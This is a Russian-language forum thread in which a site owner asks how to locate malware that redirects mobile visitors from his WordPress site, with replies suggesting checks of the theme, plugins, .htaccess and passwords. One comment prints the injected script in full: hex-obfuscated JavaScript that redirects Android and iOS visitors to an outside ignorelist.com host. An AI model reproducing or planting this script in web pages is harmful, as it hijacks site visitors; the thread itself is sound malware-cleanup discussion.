Как узнать где прописан червь в WP?

Question

[Константин]

На хостинге завелся червь, который при заходе с мобильно на сайты подменяет урл и выдает не те сайты что нужно.
Раньше почти все сайты были на хтмл, сейчас посадил часть на wordpress. Но через два месяца червь стал и на этом сайте подменять адрес с мобильного. Как вычислить где он прописался?

Answer 1

[Максим Гречушников]

проверьте
1. шаблон. в первую очередь футерр.
2. плагины.
больше негде

Answer 2

[Chvalov]

Смени пароли от биллинга и от FTP
Возможно есть шелл на сайте, или дыра через которую залили тебе эту гадость.

Посмотри файл .htaccess и файлы шаблона.
Так как переадрысация мобильных может быть только по Юзер-Агенту (Самый частый способ).

Также не помешал бы тебе AI-Bolit
И если можно, дай ссылку на сайт

И еще, подменяет у всех или только у тебя ?

Comments

[Chvalov]

Константин: Хах я понял в чем прикол )

Вас этот скрипт не смущает:

<script>var _0x26ee=["\x74\x64\x73\x6B\x6A","\x74\x65\x73\x74\x63\x6F\x6F\x6B\x69\x65","\x6D\x61\x74\x63\x68","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x69\x65\x79\x66\x67\x69\x77\x65\x2E\x69\x67\x6E\x6F\x72\x65\x6C\x69\x73\x74\x2E\x63\x6F\x6D\x2F\x65\x30\x32\x7A","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x69\x65\x79\x66\x67\x69\x77\x65\x2E\x69\x67\x6E\x6F\x72\x65\x6C\x69\x73\x74\x2E\x63\x6F\x6D\x2F\x65\x30\x32\x44","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67","","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x70\x61\x74\x68\x3D\x2F","\x3B","\x73\x70\x6C\x69\x74","\x6C\x65\x6E\x67\x74\x68","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x63\x68\x61\x72\x41\x74","\x20","\x69\x6E\x64\x65\x78\x4F\x66"];var x=readCookie(_0x26ee[0]);if(!x){createCookie(_0x26ee[0],_0x26ee[1],1);if(navigator[_0x26ee[3]][_0x26ee[2]](/Android/i)){window[_0x26ee[4]]=_0x26ee[5]}else {if(navigator[_0x26ee[3]][_0x26ee[2]](/iPhone|iPad|iPod/i)){window[_0x26ee[4]]=_0x26ee[6]}};};function createCookie(_0x7af0x3,_0x7af0x4,_0x7af0x5){if(_0x7af0x5){var _0x7af0x6= new Date();_0x7af0x6[_0x26ee[8]](_0x7af0x6[_0x26ee[7]]()+(_0x7af0x5*24*60*60*1000));var _0x7af0x7=_0x26ee[9]+_0x7af0x6[_0x26ee[10]]();}else {var _0x7af0x7=_0x26ee[11]};document[_0x26ee[12]]=_0x7af0x3+_0x26ee[13]+_0x7af0x4+_0x7af0x7+_0x26ee[14];}function readCookie(_0x7af0x3){var _0x7af0x9=_0x7af0x3+_0x26ee[13];var _0x7af0xa=document[_0x26ee[12]][_0x26ee[16]](_0x26ee[15]);for(var _0x7af0xb=0;_0x7af0xb<_0x7af0xa[_0x26ee[17]];_0x7af0xb++){var _0x7af0xc=_0x7af0xa[_0x7af0xb];while(_0x7af0xc[_0x26ee[19]](0)==_0x26ee[20]){_0x7af0xc=_0x7af0xc[_0x26ee[18]](1,_0x7af0xc[_0x26ee[17]])};if(_0x7af0xc[_0x26ee[21]](_0x7af0x9)==0){return _0x7af0xc[_0x26ee[18]](_0x7af0x9[_0x26ee[17]],_0x7af0xc[_0x26ee[17]])};};return null;}</script><script>,
	'opacity': false,
	'speedIn': ,
	'speedOut': ,
	'changeSpeed': ,
	'overlayShow': false,
	'overlayOpacity': "",
	'overlayColor': "",
	'titleShow': false,
	'titlePosition': '',
	'enableEscapeButton': false,
	'showCloseButton': false,
	'showNavArrows': false,
	'hideOnOverlayClick': false,
	'hideOnContentClick': false,
	'width': ,
	'height': ,
	'transitionIn': "",
	'transitionOut': "",
	'centerOnScroll': false
});


})
</script>

[Chvalov]

Константин: Вот в расшифрованном виде: ddecode.com/hexdecoder/?results=6315ddb9771aad287f...

[Chvalov]

Chvalov: по этой ссылке wieyfgiwe.ignorelist.com/e02z идет редирект на плей маркет
Там стоит проверка по юзер агенту ))

[Chvalov]

Константин: За бутылку пива все исправлю )

[Константин]

Эт где он? Если не сложно можешь в скайп стукнуться designer_stilet

[Chvalov]

Константин: Стукнул, подтвердите )

[Chvalov]

Вопрос решен !

Answer 3

[Настя Сухарик]

на одном сайте был такой трабл, проверь свой комп, проверь фтп, затем в шаблоне ищи скрипт, у меня был в хидере. ты можешь фаербагом его сначала найти.

Answer 4

[Елена]

Сменить пароли ко всему - это по любому.
Ну найти червя нужно через Total Commander. Wordpress это такая CMS у которой много уязвимостей из-за плагинов. Может проверьте плагины.

Answer 5

[Александр Евгеньевич]

Этот вирус сидит в HTACCESS, точнее не он сам, а результат деятельности. Сам же вирус, скорее всего, в фалах 404.php и в languages папке. Посмотрите мои ответы предыдущие, там есть решения, как с этим бороться.

Answer 6

[Константин]

Спасибо за ответы. Как искать через тотал червяков? Что-то не встречал подобного.

Вот HTACCESS
# BEGIN WordPress

RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress